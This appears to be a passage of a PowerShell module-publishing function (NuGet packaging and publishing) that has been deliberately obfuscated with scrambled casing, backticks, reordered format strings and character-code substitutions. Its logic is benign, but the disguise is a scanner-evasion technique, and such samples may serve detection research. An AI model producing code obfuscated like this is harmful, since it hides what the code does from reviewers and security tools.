function pU`BlIsH-psArt`I`FACT`UtILITy {
    [CmdletBinding(POsITIoNaLbIndINg = ${fa`l`se})]
    Param
    (
        [Parameter(MandatorY = ${tr`UE}, PARAMEterSetNaMe = "PUblI`s`h`mODULe")]
        [ValidateNotNullOrEmpty()]
        [PSModuleInfo]
        ${psmOd`ULeI`N`FO},

        [Parameter(MaNDatORY = ${tR`UE}, parAmeTerSeTNAME = "P`UB`l`iSH`sCRiPt")]
        [ValidateNotNullOrEmpty()]
        [PSCustomObject]
        ${PsSC`Ri`P`TINfO},

        [Parameter(mAndAtoRy = ${TR`Ue}, PArameteRseTName = "pU`BLi`Sh`m`oDUlE")]
        [ValidateNotNullOrEmpty()]
        [string]
        ${mAnIfeS`T`P`ATh},

        [Parameter(MaNdAtoRy = ${TR`Ue})]
        [ValidateNotNullOrEmpty()]
        [string]
        ${Dest`I`NaTI`on},

        [Parameter(mANdATorY = ${tr`Ue})]
        [ValidateNotNullOrEmpty()]
        [string]
        ${REp`O`SITOry},

        [Parameter(mANDaTory = ${tR`Ue})]
        [ValidateNotNullOrEmpty()]
        [string]
        ${NUGEtaP`I`key},

        [Parameter(manDAToRY = ${FA`LSe})]
        [pscredential]
        ${cReden`T`ial},

        [Parameter(manDaTORY = ${t`RuE})]
        [ValidateNotNullOrEmpty()]
        [string]
        ${N`UG`etpa`ckageR`oOT},

        [Parameter(parametERSEtnaMe = "P`U`BLIS`HmO`DULe")]
        [Version]
        ${FOR`matv`ErsioN},

        [Parameter(PArAMEteRseTNAmE = "Pu`BlISHm`oDu`lE")]
        [string]
        ${rE`lEaSEn`Otes},

        [Parameter(pArAmEtERSeTNamE = "PU`B`LIs`HmodUlE")]
        [string[]]
        ${t`Ags},

        [Parameter(pArAMETERSetnAME = "pubLISH`M`o`DuLe")]
        [switch]
        ${SKIPaUt`OMAt`icT`AGS},

        [Parameter(pARAMETERsetNAmE = "Pu`B`L`ISHMoDuLE")]
        [Uri]
        ${L`icE`N`SEUrI},

        [Parameter(ParamETersETNAMe = "P`UBlIs`hMO`DuLE")]
        [Uri]
        ${ICo`N`Uri},

        [Parameter(PARAmeTErSetnAmE = "PUbli`sH`Mo`dUle")]
        [Uri]
        ${pr`Oje`cTURI},

        [Parameter(parAmETerseTname = "p`UBlIs`hmoduLe")]
        [string[]]
        ${eXcLU`DE}
    )

    &("{1}{4}{3}{0}{2}" -f 'bos','W','e','r','rite-Ve') ("{4}{1}{2}{9}{3}{0}{6}{5}{8}{7}"-f 'ifa','ng Publis','h','t','Calli','l','ctUti','ty','i','-PSAr')
    &("{3}{1}{0}{5}{4}{2}{6}" -f 'NuGe','ll-','i','Insta','entBinar','tCli','es') -CallerPSCmdlet ${pSC`md`LeT} -BootstrapNuGetExe

    ${P`saRti`Fa`Ct`TyPE} = ${S`crI`p`T`:PsA`Rtif`Actt`YpemODULe}
    ${N`AmE} = ${n`UlL}
    ${dEscR`IPT`I`ON} = ${N`UlL}
    ${Ve`Rs`IOn} = ""
    ${AuT`h`OR} = ${nU`ll}
    ${Co`Mp`ANy`NAmE} = ${nu`lL}
    ${C`OPYR`IGht} = ${nU`lL}
    ${R`eQUi`ReLiCeN`sEaC`C`ept`A`Nce} = ("{1}{0}"-f'e','fals')

    if (${PsMOD`Ul`Ei`NFo}) {
        ${nA`ME} = ${ps`Modu`lE`i`NFo}."n`Ame"
        ${dE`S`cRipt`Ion} = ${P`SmodUL`e`InFo}."deScr`IpT`i`On"
        ${Ve`RsI`On} = ${P`S`Mo`DuLeiN`Fo}."V`e`RsIoN"
        ${a`UT`HoR} = ${ps`m`odul`EIN`Fo}."AuT`hoR"
        ${co`MpANY`Name} = ${PsmO`dU`lEI`NFo}."comPAnY`N`AmE"
        ${c`Opyri`ght} = ${ps`mODu`l`eINFo}."c`Opy`RigHT"

        if (${pSmODUleI`N`Fo}."Pr`iV`At`eDATa" -and
            (${pSm`oD`UlE`IN`FO}."PriV`AT`edAtA".("{0}{1}"-f 'G','etType').Invoke().("{0}{2}{1}" -f'ToS','ng','tri').Invoke() -eq ("{2}{4}{3}{6}{0}{5}{1}"-f '.Ha','le','Sys','cti','tem.Colle','shtab','ons')) -and
            ${psM`o`du`LEinfO}."P`Ri`VaTED`ATa"[("{0}{1}"-f'P','SData')] -and
            (${PsM`ODU`LEi`NfO}."pr`iV`ATE`DATA"[("{1}{0}" -f'a','PSDat')].("{2}{0}{1}"-f 'yp','e','GetT').Invoke().("{0}{1}" -f'T','oString').Invoke() -eq ("{1}{4}{2}{6}{7}{3}{0}{8}{5}"-f '.H','Sy','em.Col','ons','st','ble','lec','ti','ashta'))
        ) {
            if ( -not ${tA`gS} -and ${Psm`O`DulE`iN`Fo}."prIV`A`Te`DaTa"."p`SData"[("{1}{0}"-f 'gs','Ta')]) {
                ${T`AGS} = ${PSMOd`Ule`inFO}."p`RiVA`Te`dAtA"."Psd`A`TA"."t`AGS"
            }

            if ( -not ${RE`LEaS`Eno`T`Es} -and ${psm`O`dUle`infO}."pr`iVaTe`dATA"."pS`datA"[("{0}{1}{2}" -f'Release','Not','es')]) {
                ${RELE`AS`en`Ot`Es} = ${p`SMoDUl`Ein`FO}."pRiv`AteD`A`TA"."ps`dATa"."R`eLeAsenO`Tes"
            }

            if ( -not ${LiC`eN`sEuRi} -and ${Ps`Mo`du`LeinFo}."PRIvA`TEdA`TA"."P`Sd`ATA"[("{1}{2}{0}" -f 'i','Licen','seUr')]) {
                ${Lic`EN`SeurI} = ${Ps`m`odu`Lei`NfO}."PrIvaT`E`d`AtA"."pSd`ATA"."LiC`ENs`EuRi"
            }

            if ( -not ${Ic`ON`URI} -and ${p`sModuLEIN`Fo}."P`R`I`VATeDATa"."P`Sda`Ta"[("{1}{0}"-f 'ri','IconU')]) {
                ${IcoN`Uri} = ${PsMoDu`Le`i`NFo}."pRi`VaTE`DATA"."PSda`TA"."I`cOn`URi"
            }

            if ( -not ${pROJe`Ct`URi} -and ${P`sm`oDULeinFO}."p`RIVA`TEDaTa"."ps`DaTa"[("{0}{2}{1}"-f 'Proje','i','ctUr')]) {
                ${PRo`je`CT`Uri} = ${PS`moD`ULEinFO}."p`RIvAtE`data"."PSd`Ata"."Pr`ojEcTu`RI"
            }

            if (${psmod`UL`EinFO}."pr`IvAteD`Ata"."psd`A`TA"[("{2}{0}{1}"-f 'relea','se','Pre')]) {
                ${psmODULEiNfOpR`E`R`E`L`E`As`eST`Ring} = ${pS`mo`dULE`inFo}."P`RiVa`TE`daTa"."psD`A`Ta"."P`R`ERe`LEAsE"
                if (${PsmOdUl`Ei`Nf`OPR`e`RElEAs`e`Str`inG} -and ${p`sMoDulEInFOP`R`er`e`leA`sest`R`iNg}.("{0}{2}{1}" -f'Sta','With','rts').Invoke("-")) {
                    ${Ver`S`IOn} = [string]${vE`RSi`ON} + ${psm`oDuleinfOPRe`Rel`E`A`S`ES`Tr`INg}
                }
                else {
                    ${VER`SI`On} = [string]${ver`S`ion} + "-" + ${psMoDULE`iNfOPr`E`R`E`Le`A`SeStRing}
                }
            }

            if (${PSMODUlE`i`N`FO}."PriV`ATED`ATA"."ps`daTa"[("{3}{2}{4}{0}{1}"-f 'eAccepta','nce','uireLicen','Req','s')]) {
                ${reQU`IR`e`LI`CensEAc`CEP`TancE} = ${PsMoDUL`ein`Fo}."PRiv`AtEDa`TA"."p`sdAta"."re`QUIRe`lI`cEn`sE`AccePT`An`ce".("{1}{2}{0}" -f 'ing','T','oStr').Invoke().("{1}{0}"-f 'ower','ToL').Invoke()
                if (${re`qUIR`EL`IceNSea`Cc`ePta`Nce} -eq ("{0}{1}" -f't','rue')) {
                    if (${FO`Rmatve`R`SioN} -and (${fOrMA`Tv`E`R`SiON}."M`Ajor" -lt ${ScRipt`:psGETreqUiReLIcENs`E`A`CcEp`T`ANcEFOR`MaTVe`RSiOn}."mAJ`oR")) {
                        ${meS`S`AGe} = ${LOCali`zE`dda`Ta}."reQuIR`E`lice`Nse`A`CCEPtAN`Ce`Nots`U`Pp`ORtED" -f (${FO`RMa`TVE`Rs`IOn})
                        &("{1}{2}{0}"-f 'rror','Thr','owE') -ExceptionName ("{1}{3}{2}{6}{0}{5}{4}"-f 'alid','S','st','y','perationException','O','em.Inv') `
                            -ExceptionMessage ${meSs`A`gE} `
                            -ErrorId ("{3}{0}{5}{2}{6}{4}{7}{1}"-f 'eLic','tSupported','seA','requir','cep','en','c','tanceNo') `
                            -CallerPSCmdlet ${P`S`cm`DleT} `
                            -ErrorCategory ("{0}{2}{1}"-f 'In','alidData','v')
                    }

                    if (-not ${l`iCeNs`EU`Ri}) {
                        ${MeSS`A`GE} = ${L`ocaLiZ`EDD`ATA}."l`I`Ce`N`seuRinO`TspeC`iFIeD"
                        &("{2}{0}{3}{1}"-f 'hr','r','T','owErro') -ExceptionName ("{1}{0}{5}{4}{2}{3}" -f'validOp','System.In','t','ion','xcep','erationE') `
                            -ExceptionMessage ${m`E`SSagE} `
                            -ErrorId ("{1}{3}{2}{4}{0}"-f'seUriNotSpecified','L','c','i','en') `
                            -CallerPSCmdlet ${p`Sc`MdLEt} `
                            -ErrorCategory ("{0}{2}{1}{3}"-f'Invali','Da','d','ta')
                    }

                    ${LIcEn`sefI`l`Ep`ATH} = &("{0}{1}{3}{4}{2}"-f 'Jo','in-Path','y','Uti','lit') -Path ${N`UgE`T`PaCk`AgEROOt} -ChildPath ("{2}{0}{1}"-f 'cen','se.txt','Li') -PathType ("{1}{0}"-f 'ile','F')
                    if (-not ${licEnSe`FI`lE`PAth} -or -not (&("{2}{0}{1}"-f's','t-Path','Te') -Path ${Li`cen`seFILEP`ATH} -PathType ("{0}{1}"-f'L','eaf'))) {
                        ${messA`gE} = ${L`oCalIZE`ddaTa}."liC`ense`TXTNoTfO`U`Nd"
                        &("{3}{1}{2}{0}"-f'ror','o','wEr','Thr') -ExceptionName ("{7}{8}{3}{6}{2}{0}{1}{4}{5}"-f'r','ationExc','Ope','va','epti','on','lid','Sy','stem.In') `
                            -ExceptionMessage ${m`E`ssaGe} `
                            -ErrorId ("{0}{2}{3}{1}"-f'Lice','d','nseT','xtNotFoun') `
                            -CallerPSCmdlet ${PS`CMD`leT} `
                            -ErrorCategory ("{0}{1}{2}"-f'Invali','d','Data')
                    }

                    if ((&("{3}{0}{1}{2}" -f'et-C','o','ntent','G') -LiteralPath ${li`CeNSe`Filepa`TH}) -eq ${nU`Ll}) {
                        ${meS`s`AgE} = ${lOC`Al`I`zEddAtA}."LicEnS`etXT`EMPTY"
                        &("{1}{0}{2}"-f 'owE','Thr','rror') -ExceptionName ("{6}{2}{4}{8}{1}{9}{7}{0}{5}{3}" -f 'c','val','t','ion','em.I','ept','Sys','ationEx','n','idOper') `
                            -ExceptionMessage ${mE`sS`AgE} `
                            -ErrorId ("{2}{0}{1}{3}{4}"-f'ic','en','L','seTx','tEmpty') `
                            -CallerPSCmdlet ${P`S`CmdLEt} `
                            -ErrorCategory ("{2}{1}{0}"-f'ata','D','Invalid')
                    }

                    
                    if (-not ${f`ORm`At`VersION}) {
                        ${Fo`Rm`Atv`ERsi`On} = ${Scr`IPT:`c`UrRENtPsge`TFOrmAtvERS`iON}
                    }
                }
                elseif (${REQu`IR`E`LiceNS`EaCcE`PTa`NCe} -ne ("{0}{1}" -f'fals','e')) {
                    ${InVal`ID`VaL`Ue`FoRr`E`QuI`R`eL`iC`ENSEAcCEpTANcE} = ${l`OcAL`IZEdDaTA}."InVaL`IDva`lUeb`OoL`eAN" -f (${reqUirELIc`EN`s`eaCCePta`Nce}, ("{3}{1}{0}{2}{5}{4}" -f 'uireL','eq','icen','r','tance','seAccep'))
                    &("{2}{1}{3}{4}{0}" -f 'ning','-','Write','W','ar') -Message ${In`Valid`V`A`LUeF`or`RE`qUiRel`ICeNS`EacCEpT`ANCE}
                }
            }
        }
    }
    else {
        ${pSaRt`I`F`Act`TYPe} = ${Sc`RIp`T:PsaRT`If`A`CttypES`CrIpt}

        ${N`AMe} = ${PSscRI`PtiN`FO}."n`AMe"
        ${d`esC`R`ipTIon} = ${PSScrI`PTI`N`Fo}."d`ES`CripTI`On"
        ${vE`RsIOn} = ${P`sS`cRipTINFO}."VE`RS`IoN"
        ${auT`h`oR} = ${pS`SCRipt`InfO}."aU`ThOr"
        ${CO`MpAnY`N`AME} = ${PSScRI`pt`In`Fo}."cO`mp`AnyNa`Me"
        ${Cop`YrI`G`ht} = ${psscr`I`pti`NFO}."COp`y`RiGHt"

        if (${pssc`RiPTIN`Fo}.'Tags') {
            ${t`AgS} = ${P`ssCrI`p`TinFO}."T`AGS"
        }

        if (${PSsCri`pt`I`NfO}.'ReleaseNotes') {
            ${REleas`e`N`Otes} = ${ps`ScRIP`TI`Nfo}."ReLe`AseNoT`ES"
        }

        if (${pS`scrIpTiN`Fo}.'LicenseUri') {
            ${lI`cen`SeUri} = ${psScR`I`pT`inFO}."lIc`En`seUri"
        }

        if (${p`SsCr`iPtiNFo}.'IconUri') {
            ${Ic`o`NURi} = ${P`sSCrI`PT`iNfO}."I`Co`Nuri"
        }

        if (${P`SscRiP`T`iNFo}.'ProjectUri') {
            ${PR`O`JE`cTUri} = ${P`sSCRiPt`INFO}."PROjEc`Tu`RI"
        }
    }

    ${nu`SpecFI`LES} = ""
    if (${EX`C`Lude}) {
        ${N`USPEc`FIL`eEx`cl`UDE`PAtterN} = ${eXClu`de} -Join ";"
        ${NuS`pEcFI`l`ES} = @{ ("{1}{0}" -f 'c','sr') = ("{1}{0}" -f'*/*.*','*'); ("{0}{1}"-f 'exc','lude') = ${N`UsPEC`FilEeXclUD`E`PatT`E`RN} }
    }

    
    if (-not ${t`AgS}) {
        ${t`AgS} = @()
    }

    if (${F`or`m`ATVE`RSIoN}) {
        ${tA`Gs} += "$($script:PSGetFormatVersion)_$FormatVersion"
    }

    ${DEpEN`d`E`NTMo`dUlED`e`Tai`lS} = @()

    if (${PsSCri`p`T`InFO}) {
        ${T`AGS} += ("{2}{0}{1}"-f 'S','Script','P')

        if (${p`SsCrIpTiN`Fo}."DEfI`NE`dC`omM`ANDS" -and -not ${sKiP`A`U`TOmAti`CT`Ags}) {
            if (${PS`scrIp`TinFO}."Defi`N`EdFUn`cTi`ons") {
                ${Ta`gS} += "$($script:Includes)_Function"
                ${t`AgS} += ${Ps`SCR`IpTiNFO}."De`FINed`Func`TIONs" | &((("{5}{0}{4}{10}{1}{6}{2}{3}{7}{9}{8}" -f 'ic','rShel','.Co','reTX6ForEach-','ros','M','l','Obj','ct','e','oft.Powe'))-cReplaCe  ([cHaR]84+[cHaR]88+[cHaR]54),[cHaR]92) { "$($script:Function)_$_" }
            }

            if (${psScrI`PtIN`Fo}."dEFin`EdwoR`kFLO`WS") {
                ${t`Ags} += "$($script:Includes)_Workflow"
                ${ta`gs} += ${ps`Sc`RIp`TINfo}."De`FI`NeDwOrkFLo`wS" | &(("{8}{1}{7}{4}{5}{2}{3}{0}{6}{9}" -f 'F','soft','re','1zp','erShell.C','o','orEach-Objec','.Pow','Micro','t')).REPlACe('1zp',[stRiNg][CHAR]92) { "$($script:Workflow)_$_" }
            }

            ${T`AGs} += ${pSS`cRIPtiN`FO}."deFINED`cO`MMa`N`ds" | &((("{4}{8}{9}{5}{2}{1}{10}{6}{3}{7}{11}{0}" -f'ct','.','erShell','a','M','Pow','oreYkjForE','c','icrosof','t.','C','h-Obje'))  -crEpLace([char]89+[char]107+[char]106),[char]92) { "$($script:Command)_$_" }
        }

        
        
        ${VALIDA`TeA`NdGEtScRIpTDEP`eN`denCi`es_Para`mS} = @{
            ("{1}{2}{0}" -f 'ository','R','ep')          = ${R`e`POSITOry}
            ("{1}{3}{5}{0}{2}{4}"-f 't','D','I','epende','nfo','ntScrip') = ${pss`CR`IPTI`NFO}
            ("{2}{3}{0}{1}" -f'l','et','Calle','rPSCmd')      = ${psc`M`DLeT}
            ("{0}{1}{2}"-f 'Ver','bos','e')             = ${Verb`OsePRE`FerEn`CE}
            ("{0}{1}"-f'D','ebug')               = ${d`eBugP`REfeR`EN`CE}
        }
        if (${pSb`oUNDpA`RA`M`et`ErS}.("{3}{0}{1}{2}" -f'i','n','sKey','Conta').Invoke(("{1}{2}{0}" -f'l','Cred','entia'))) {
            ${vALI`DATEaN`Dg`eTs`CRIpT`D`e`Pe`N`DENci`ES`_PARa`MS}.("{0}{1}" -f 'A','dd').Invoke(("{2}{1}{0}"-f 'l','ia','Credent'), ${CR`e`DenT`IaL})
        }
        ${DEp`e`N`D`ENtMoDUL`EdEtAIlS} += &("{3}{2}{5}{4}{7}{1}{0}{6}"-f 'ie','tDependenc','lidate','Va','ndGet-Sc','A','s','rip') @ValidateAndGetScriptDependencies_Params
    }
    else {
        ${Ta`GS} += ("{1}{2}{0}"-f'e','PSMo','dul')

        ${Mo`dul`em`AnifE`sTHashTaBLe} = &("{2}{4}{0}{6}{1}{5}{3}"-f'Manife','Has','G','e','et-','hTabl','st') -Path ${maNIf`eST`patH}

        if (-not ${skiPauT`OmatiCT`A`Gs}) {
            if (${Psmod`U`LEi`NFO}."EX`PORTeD`co`mmAn`Ds"."COu`NT") {
                if (${PSM`oDu`le`INFO}."E`xp`OrTEd`c`Mdlets"."C`OuNT") {
                    ${TA`gS} += "$($script:Includes)_Cmdlet"
                    ${tA`Gs} += ${PsmO`DULE`IN`Fo}."EXpORT`edcm`dlEtS"."k`EyS" | &((("{8}{4}{3}{10}{2}{13}{7}{1}{12}{5}{6}{11}{9}{0}" -f 'bject','or','l','PowerS','crosoft.','rE','ac','C','Mi','-O','he','h','euNwFo','l.')) -CReplacE  ([cHAR]117+[cHAR]78+[cHAR]119),[cHAR]92) { "$($script:Cmdlet)_$_" }

                    
                    if (${moDu`l`eMAn`ifE`StH`ASHtAB`lE} -and ${m`o`DUlEManIFE`sT`h`AshTAB`lE}.("{2}{1}{3}{0}" -f 'Key','ain','Cont','s').Invoke(("{3}{2}{0}{1}" -f'p','ort','Ex','CmdletsTo')) -and (${M`oDULemani`FeSt`H`AshtAblE}."CM`dlETSTOeXP`ORt" -eq "*")) {
                        ${W`ArNi`NG`MESSAGE} = ${lOcaL`Ize`D`dATa}."Sh`OulDinC`LUdE`CM`dl`etS`To`Ex`poRT" -f (${m`AnIfest`paTh})
                        &("{0}{2}{1}" -f 'Writ','g','e-Warnin') -Message ${Wa`R`NIn`GmESs`Age}
                    }
                }

                if (${P`sMO`duLeiNfo}."Ex`porte`d`FuNcTiO`NS"."COu`Nt") {
                    ${ta`Gs} += "$($script:Includes)_Function"
                    ${TA`Gs} += ${pSMOdul`eI`NFO}."E`xPo`RtedFuN`C`TiOns"."K`EYs" | &((("{5}{4}{0}{3}{6}{1}{2}{7}" -f 'ros','eVimForEach-','O','oft.P','c','Mi','owerShell.Cor','bject'))  -RePLAce  ([ChaR]86+[ChaR]105+[ChaR]109),[ChaR]92) { "$($script:Function)_$_" }

                    if (${m`o`dUL`emanifEstHaSht`AbLe} -and ${modUl`eman`iF`eS`TH`ASHtablE}.("{3}{0}{2}{1}" -f'o','insKey','nta','C').Invoke(("{3}{4}{0}{1}{2}" -f 'x','por','t','Fu','nctionsToE')) -and (${MoDuLeMa`NIf`e`STH`AsH`T`AbLE}."fun`CTiONsTo`Ex`poRt" -eq "*")) {
                        ${WARNI`Ngm`ES`SaGe} = ${LOCa`LIZEd`D`ATA}."sHoul`dI`NC`lUDeFunct`iOns`T`oEX`P`ORT" -f (${M`A`NIfest`paTh})
                        &("{2}{1}{0}"-f'ing','e-Warn','Writ') -Message ${wArNINgMEs`S`A`gE}
                    }
                }

                ${T`Ags} += ${Ps`Modu`L`eIn`FO}."eXpoRt`E`DcOmm`ANds"."k`EyS" | &((("{4}{3}{6}{7}{11}{5}{9}{0}{2}{10}{8}{1}" -f'el','ect','l.Core','ros','Mic','S','of','t.Pow','ach-Obj','h','VPhForE','er'))-CRePlAcE ([ChAR]86+[ChAR]80+[ChAR]104),[ChAR]92) { "$($script:Command)_$_" }
            }

            ${d`Sc`ReSoUrCE`NAmEs} = &("{0}{1}{6}{2}{4}{3}{7}{5}" -f'G','et-','x','o','p','tedDscResources','E','r') -PSModuleInfo ${p`SMOd`UL`einFo}
            if (${D`s`cREso`UrcEna`M`eS}) {
                ${T`AGs} += "$($script:Includes)_DscResource"

                ${t`AGS} += ${DScr`EsouRCEN`A`MEs} | &((("{0}{7}{4}{1}{6}{3}{5}{2}"-f 'Microsoft.','rShell.CoreiU','ct','ach-Ob','owe','je','BForE','P'))-CREPLaCe  'iUB',[cHAr]92) { "$($script:DscResource)_$_" }

                
                if (${MoDULEMa`NIf`est`h`A`SH`TablE} -and
                    (${m`OdUle`m`A`NIfE`stHaShTA`BLe}.("{2}{1}{0}"-f 'insKey','a','Cont').Invoke(("{2}{0}{4}{3}{5}{1}" -f'o','port','DscRes','sToE','urce','x')) -and
                        ${Mo`d`UleMAn`iFE`sth`ASH`TAb`lE}."d`sCREsourCEs`T`oexP`Ort" -eq "*") -or
                    -not ${MOD`UleM`ANifesT`hash`TaB`lE}.("{0}{2}{1}" -f'Conta','Key','ins').Invoke(("{3}{0}{4}{6}{2}{1}{5}"-f 'es','xpo','esToE','DscR','ou','rt','rc'))) {
                    ${waRN`Ing`meSs`AGE} = ${l`OCa`lizE`dData}."Sh`ouLdINcLUDE`DSCResOur`c`eST`oEXPORt" -f (${ma`NI`F`ESTPaTH})
                    &("{1}{2}{0}"-f 'arning','Writ','e-W') -Message ${WA`RNiNg`MESSa`Ge}
                }
            }

            ${r`O`lec`ApabiliTYnaM`ES} = &("{4}{8}{2}{5}{7}{9}{3}{0}{6}{1}" -f'yN','e','vaila','bilit','Ge','bl','am','eRoleC','t-A','apa') -PSModuleInfo ${pSM`o`duLei`N`FO}
            if (${RoleC`ApabIli`T`Yn`AMES}) {
                ${tA`GS} += "$($script:Includes)_RoleCapability"

                ${tA`gS} += ${rO`l`ecAPAb`I`l`It`Ynames} | &(("{7}{8}{6}{3}{5}{4}{1}{2}{0}" -f'-Object','ac','h','Sh','E','ell.CoreBNmFor','Power','Microso','ft.')).RePLace(([chAR]66+[chAR]78+[chAR]109),[stRINg][chAR]92) { "$($script:RoleCapability)_$_" }
            }
        }

        
        
        ${Getm`ODuled`eP`END`E`NcIe`S_p`A`RaMs} = @{
            ("{2}{0}{3}{1}" -f'odule','fo','PSM','In')   = ${ps`mO`DULE`info}
            ("{0}{1}{2}"-f 'Repo','sitor','y')     = ${rEPos`i`To`Ry}
            ("{3}{0}{2}{1}"-f'rP','t','SCmdle','Calle') = ${PSc`MDL`et}
            ("{0}{1}{2}"-f 'Verbo','s','e')        = ${V`E`R`BoSepREfeR`EN`CE}
            ("{1}{0}"-f 'ug','Deb')          = ${DeB`UG`pR`EfereN`cE}
        }
        if (${PSb`ou`ND`PArA`ME`TErS}.("{2}{0}{1}" -f 'in','sKey','Conta').Invoke(("{0}{2}{1}" -f'Cr','dential','e'))) {
            ${Ge`Tm`odULEdE`PeN`deNc`ieS_paRa`Ms}.("{1}{0}" -f 'd','Ad').Invoke(("{1}{0}{2}"-f 'e','Cr','dential'), ${crEd`EN`TiAl})
        }
        ${d`ePe`ND`EntmOD`ULEDE`Tails} = &("{6}{0}{3}{4}{5}{1}{2}" -f'et-','ndenci','es','M','oduleDep','e','G') @GetModuleDependencies_Params
    }

    ${DependE`N`cI`eS} = @()
    ForEach (${d`EPeN`dEnCy} in ${d`EPENDE`NT`MOd`U`LeDeTAiLS}) {
        ${mO`d`ULENA`mE} = ${dep`e`N`DEncY}."Na`Me"
        ${V`Er`Si`OnstR`INg} = ""

        
        
        
        
        
        
        
        
        

        if (${dEPE`ND`E`Ncy}."Ke`yS" -Contains ("{0}{1}{3}{2}"-f'Requi','re','rsion','dVe')) {
            ${v`eRSiO`Ns`TR`iNG} = "[$($Dependency.RequiredVersion)]"
        }
        elseif (${de`PEnD`encY}."K`eYs" -Contains ("{0}{2}{1}"-f 'M','mVersion','inimu') -and ${deP`en`d`eNCy}."KE`yS" -Contains ("{1}{4}{2}{0}{3}"-f 'o','Max','ersi','n','imumV')) {
            ${veRsiO`Ns`T`RI`Ng} = "[$($Dependency.MinimumVersion),$($Dependency.MaximumVersion)]"
        }
        elseif (${dE`p`e`NdENCY}."Ke`Ys" -Contains ("{1}{3}{2}{0}{4}" -f 'io','M','mumVers','axi','n')) {
            ${Versi`onstR`I`Ng} = "(,$($Dependency.MaximumVersion)]"
        }
        elseif (${DepenD`e`Ncy}."k`eYS" -Contains ("{3}{4}{2}{0}{1}"-f 'rsio','n','Ve','Min','imum')) {
            ${VerSi`on`STrI`NG} = "$($Dependency.MinimumVersion)"
        }

        ${pR`o`Ps} = @{
            ('id')      = ${mo`DulEnA`ME}
            ("{0}{2}{1}" -f 've','ion','rs') = ${V`eRS`Io`NsTring}
        }

        ${d`E`pendenCY`oBJ`ECt} = &("{0}{2}{1}"-f'New','ject','-Ob') -TypeName ("{4}{3}{2}{1}{0}" -f'ject','b','stomO','u','PSC') -Property ${P`ROPs}
        ${d`epe`NdeN`C`IeS} += ${Depe`NDEnCYo`Bj`Ect}
    }

    ${PA`R`AmS} = @{
        ("{3}{0}{1}{2}"-f'putP','a','th','Out')               = ${NUGETPAc`k`AgeR`O`ot}
        ('Id')                       = ${nA`Me}
        ("{2}{1}{0}" -f 'n','rsio','Ve')                  = ${Ve`R`SioN}
        ("{0}{1}"-f 'Aut','hors')                  = ${A`Uthor}
        ("{1}{2}{0}" -f 'ers','Ow','n')                   = ${COMP`ANY`NAMe}
        ("{2}{3}{0}{1}"-f 'ipti','on','De','scr')              = ${d`eScrip`TI`on}
        ("{2}{1}{0}"-f 'aseNotes','le','Re')             = ${RelE`A`seN`o`TES}
        ("{6}{0}{4}{7}{1}{2}{3}{5}"-f'qu','seAc','cept','a','ireLic','nce','Re','en') = (${rEqUiRe`LICE`NSEaC`cEPTAN`Ce} -eq ${t`RUE})
        ("{0}{3}{2}{1}" -f 'C','ht','g','opyri')                = ${coPY`R`ighT}
        ("{1}{0}"-f'ags','T')                     = ${t`Ags}
        ("{0}{2}{1}" -f'Lic','l','enseUr')               = ${licE`NsE`Uri}
        ("{0}{1}{2}"-f 'Proj','ect','Url')               = ${PROj`eC`TU`Ri}
        ("{1}{0}"-f 'onUrl','Ic')                  = ${I`cOn`Uri}
        ("{0}{3}{2}{1}"-f 'Dep','es','ci','enden')             = ${DE`p`eNdenCI`es}
    }

    if (${n`UsPE`CFILES}) {
        ${PaRA`MS}.("{1}{0}"-f 'd','Ad').Invoke(("{1}{0}" -f'es','Fil'), ${NUsP`E`CFil`ES})
    }

    try {
        ${nuS`PecFU`Llna`mE} = &("{0}{3}{1}{2}" -f 'New-Nus','e','cFile','p') @params
    }
    catch {
        &("{2}{0}{1}" -f'e-Err','or','Writ') -Message ('Faile'+'d '+'to'+' '+'c'+'reate'+' '+'n'+'uspec '+'fil'+'e '+"$_.Exception") -ErrorAction ("{0}{1}" -f 'S','top')
    }

    try {
        if (${dOT`Ne`T`COMMandpA`Th}) {
            ${nupKg`F`UL`LN`AmE} = &("{1}{0}{2}{3}{4}"-f'w-N','Ne','u','getP','ackage') -NuspecPath ${nUS`PecfUL`L`N`AmE} -NugetPackageRoot ${nUG`eTPA`cKAG`E`RoOt} -UseDotnetCli -Verbose:${vErbo`sePRE`F`ER`Ence}
        }
        elseif (${N`UGETExEPA`TH}) {
            ${NupKgf`U`lLN`Ame} = &("{3}{2}{0}{4}{1}"-f 'tPa','kage','Nuge','New-','c') -NuspecPath ${N`UsPEcf`ULl`N`Ame} -NugetPackageRoot ${NUGE`TpAC`KAgE`R`OOt} -NugetExePath ${n`UgEtExE`pA`Th} -Verbose:${V`ERbOS`eprEfE`ReNce}
        }

        &("{0}{1}{2}" -f'Wri','te-Verb','ose') -Message ('Succes'+'sfull'+'y '+'c'+'rea'+'ted '+'nug'+'et '+'pa'+'ckage '+'at'+' '+"$NupkgFullName")
    }
    catch {
        if (${psA`Rti`Fa`cTtYPE} -eq ${s`C`RIPt:psa`RTI`FActtypE`MOd`U`LE}) {
            ${Me`ssa`ge} = ${lo`CAL`iZE`DdATa}."faILED`TOCreaTecOm`pre`SSE`dmo`dUle" -f (${_}."e`xcEptI`oN"."meSsA`ge")
            ${e`RrO`RID} = ("{0}{3}{1}{2}{4}" -f'Failed','eateCom','pressedModu','ToCr','le')
        }
        else {
            ${me`sSA`ge} = ${lOc`ALi`Ze`DdATA}."fAilEdtOcReA`TEcOmprE`sS`ed`ScR`i`Pt" -f (${_}."E`XCePT`ion"."m`es`SAGE")
            ${ErR`ORid} = ("{2}{5}{0}{4}{1}{3}"-f 'reateCompr','ip','Faile','t','essedScr','dToC')
        }

        &("{1}{0}{2}"-f 'i','Wr','te-Error') -Message ${m`EsS`Age} -ErrorId ${ER`RO`RId} -Category ("{3}{1}{0}{2}" -f 'o','alidOperati','n','Inv') -ErrorAction ("{0}{1}"-f 'S','top')
    }

    try {
        if (${DOTNEtcom`M`An`DPA`Th}) {
            &("{2}{0}{3}{1}{4}" -f 'l','h-NugetP','Pub','is','ackage') -NupkgPath ${nuP`kgFulL`Na`mE} -Destination ${dEsti`Nat`iOn} -NugetApiKey ${N`U`gEtAPIK`ey} -UseDotnetCli -Verbose:${V`erBOsEPR`E`F`eren`cE}
        }
        elseif (${Nu`GET`exePATh}) {
            &("{4}{5}{0}{3}{2}{1}"-f 'is','ckage','NugetPa','h-','P','ubl') -NupkgPath ${NUP`kg`F`ULLName} -Destination ${DeS`Ti`NAT`IOn} -NugetApiKey ${NUgETa`P`i`kEy} -NugetExePath ${N`UG`e`TEXEpaTh} -Verbose:${VeR`B`O`seP`REf`eRENcE}
        }

